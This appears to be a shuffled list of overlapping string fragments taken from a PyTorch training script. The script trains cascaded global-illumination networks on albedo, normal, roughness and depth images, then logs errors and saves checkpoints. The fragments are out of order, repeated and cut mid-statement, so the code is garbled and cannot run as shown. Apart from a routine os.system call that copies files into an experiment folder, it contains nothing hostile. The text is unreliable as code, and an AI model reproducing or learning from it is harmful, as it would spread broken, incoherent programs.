"axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1,",
"= sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W *",
"np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu',",
"1 # Load data from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu",
"width of the input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int,",
"of cascades should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 )",
"j += 1 # Load data from cpu to gpu albedo_cpu = dataBatch['albedo']",
"j, n) ) trainingLog.close() # Update the training rate if (epoch + 1)",
"dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2']",
"torch.optim as optim import argparse import random import os import models import torchvision.utils",
"globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3',",
"utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu',",
"import numpy as np from torch.autograd import Variable import torch.optim as optim import",
").data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data ,",
"utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch,",
"truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image(",
"0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel],",
"opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if",
"g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random",
"dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8,",
"opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture # globalIllu2s = [] globalIllu3s",
"imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum",
"10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING:",
"1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch)",
"torch import numpy as np from torch.autograd import Variable import torch.optim as optim",
"device, so you should probably run with --cuda\") #################################### # initalize tensors albedoBatch",
"= dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu =",
"(globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum /",
"torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have a CUDA device, so you should",
"globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward()",
"/ 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W *",
"(globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum =",
":], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else:",
"'{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut",
"epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the",
"= imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 =",
"lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader",
":], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1,",
"vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2)",
"j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) )",
"parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input image to network')",
"3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch =",
"= dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu =",
"j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0),",
"{0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3",
"= optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize =",
"of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path to",
") vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch)",
"opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j,",
"np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu',",
"= 'store_true', help='whether to fine-tune the network or not') parser.add_argument('--epochId', type=int, default =",
"random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have a CUDA device,",
"# The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades",
"type=int, nargs='+', default=[0], help='the gpus used for training network') # The training weight",
"j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones(",
"totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs,",
"imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 )",
"opt.cuda: print(\"WARNING: You have a CUDA device, so you should probably run with",
"= dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu =",
"epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0)",
"2000 == 0: # Save the ground truth and the input vutils.save_image( (0.5*(albedoBatch",
"np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel],",
"parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or not') parser.add_argument('--epochId', type=int,",
"cascades should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if",
"axis=0), trainingLog, epoch, j) if j == 1 or j == 1000 or",
"= -1, help='the training epoch of the network') # The detail network setting",
"torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have a CUDA device, so",
"'w') for i, dataBatch in enumerate(brdfLoader): j += 1 # Load data from",
"= [] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch],",
").data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the training rate if (epoch",
"normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu",
"depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape)",
"== 1000 or j% 2000 == 0: # Save the ground truth and",
"open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j += 1 # Load",
") np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) ) torch.save(globIllu2to3.state_dict(), '{0}/globIllu2to3_{1}.pth'.format(opt.experiment, epoch) )",
"1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for",
"globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j)",
"architecture # globalIllu2s = [] globalIllu3s = [] n = 0 inputGlob2 =",
"g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training",
") g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000)",
"= imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimier",
"of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination",
"Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network",
") opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture # globalIllu2s =",
"'{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment,",
"default=256, help='the height / width of the input image to network') parser.add_argument('--cuda', action='store_true',",
"batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input image",
"= Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )",
"* (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum",
"imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination()",
"< 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch,",
"normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu",
"dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch,",
"dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3']",
"help='the weight of global illumination prediction 3') # Fine Tune the network parser.add_argument('--isFineTune',",
"opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch),",
").data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data ,",
"if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :],",
"segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs =",
"weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global",
"j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList",
"axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :],",
"opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2",
"= dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers =",
"epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList",
"= Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )",
"'{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j)",
"should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment",
"import argparse import random import os import models import torchvision.utils as vutils import",
"default=1, help='the weight of global illumination prediction 3') # Fine Tune the network",
"vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data,",
"cascade network architecture # globalIllu2s = [] globalIllu3s = [] n = 0",
"parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1,",
"normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId)",
"global illumination prediction 3') # Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true',",
"training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height /",
"Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs,",
"( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data",
"# Build the cascade network architecture # globalIllu2s = [] globalIllu3s = []",
"for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /=",
"opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send",
"imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape)",
"utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList =",
"type=float, default=1, help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the",
"probably run with --cuda\") #################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize,",
"epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0),",
"dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ########################################################",
") depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut",
"Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch",
"default = -1, help='the training epoch of the network') # The detail network",
"opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3,",
"= normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch =",
"in enumerate(brdfLoader): j += 1 # Load data from cpu to gpu albedo_cpu",
"trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)],",
") globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum +",
"j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0)",
")**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the training rate if",
", '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results for n in range(0,",
"/0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch +",
"0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset =",
"opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed: \", opt.seed)",
"np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)",
"if j == 1 or j == 1000 or j% 2000 == 0:",
"torchvision.utils as vutils import utils import dataLoader from torch.utils.data import DataLoader parser =",
"3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum",
"of the input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+',",
") trainingLog.close() # Update the training rate if (epoch + 1) % 2",
"run with --cuda\") #################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)",
"* globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j)",
"globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5,",
"# Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the",
"tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize,",
"Save the ground truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment,",
"from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal']",
"0: # Save the ground truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch)",
"+= 1 # Load data from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape)",
").data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image(",
"'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment ) g2W, g3W =",
"opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed)",
"###################### # Send things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch =",
"######################################################## # Build the cascade network architecture # globalIllu2s = [] globalIllu3s =",
"axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :],",
"os.system('cp *.py %s' % opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId =",
"argparse.ArgumentParser() # The locationi of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment',",
"epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) ) torch.save(globIllu2to3.state_dict(), '{0}/globIllu2to3_{1}.pth'.format(opt.experiment,",
") globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send things into GPU if",
"= False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList",
"n in range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2)",
"rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu",
"= opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle =",
"1) % 2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for",
")**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2)",
") roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize,",
"imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## #",
"opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize,",
"# The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction",
"have a CUDA device, so you should probably run with --cuda\") #################################### #",
"and not opt.cuda: print(\"WARNING: You have a CUDA device, so you should probably",
"random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda:",
"help='whether to fine-tune the network or not') parser.add_argument('--epochId', type=int, default = -1, help='the",
") normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize,",
"opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch,",
